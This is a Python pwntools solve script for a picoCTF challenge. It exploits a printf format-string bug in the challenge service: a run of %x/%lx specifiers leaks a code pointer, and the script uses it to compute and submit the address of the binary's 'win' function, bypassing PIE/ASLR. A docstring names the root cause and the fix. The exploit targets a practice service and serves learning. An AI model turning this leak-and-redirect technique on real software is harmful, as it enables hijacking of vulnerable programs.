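#!/usr/bin/env python
"""Solve script for a picoCTF challenge service (pwntools).

Flow, as performed below:
  1. Connect and wait for the ``name:`` prompt.
  2. Answer with printf-style conversion specifiers; the service echoes
     back values, the last of which is parsed as a code address.
  3. Turn that address into the load address of ``win`` using offsets
     taken from the challenge binary.
  4. Send the computed address at the ``12345: `` prompt.

Root cause on the service side (presumably): the submitted name is used
as the printf format string itself.  A leaked code pointer is enough to
undo PIE/ASLR for the image; passing input as an argument to a constant
format (``printf("%s", name)``) and building with ``-Wformat-security``
removes the leak.
"""
from pwn import *

# Local run against the binary instead of the hosted instance.
#conn = process("./vuln")
conn = remote('rescued-float.picoctf.net', 49587)

# Build-specific constants: they must match the exact binary served by the
# challenge, otherwise the computed address is wrong.
main_offset = 0x1400          # offset of main inside the image
win_offset = 0x136a           # offset of win inside the image
call_fun_ret_offset = 65      # leaked value minus this gives main (per the arithmetic below)

conn.recvuntil(b'name:')
# A run of %x conversions consumes the leading arguments; the value printed
# after the '.' separator by %lx is the one parsed below.
conn.sendline(b'%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx')
conn.recvuntil(b'.')
# int() raises ValueError if the reply is not hex, i.e. the leak failed.
return_addr = int(conn.recvline(), 16)
# Addresses are logged in hex so they can be compared with a disassembly.
log.info(f"received return addr: {hex(return_addr)}")

conn.recvuntil(b'12345: ')

main_addr = return_addr - call_fun_ret_offset
# Runtime address of win = image base (main_addr - main_offset) + win_offset.
# Kept in its own name so the offset constant is not overwritten by an
# absolute address.
win_addr = main_addr - main_offset + win_offset
conn.sendline(hex(win_addr).encode())
conn.recvline()
conn.interactive()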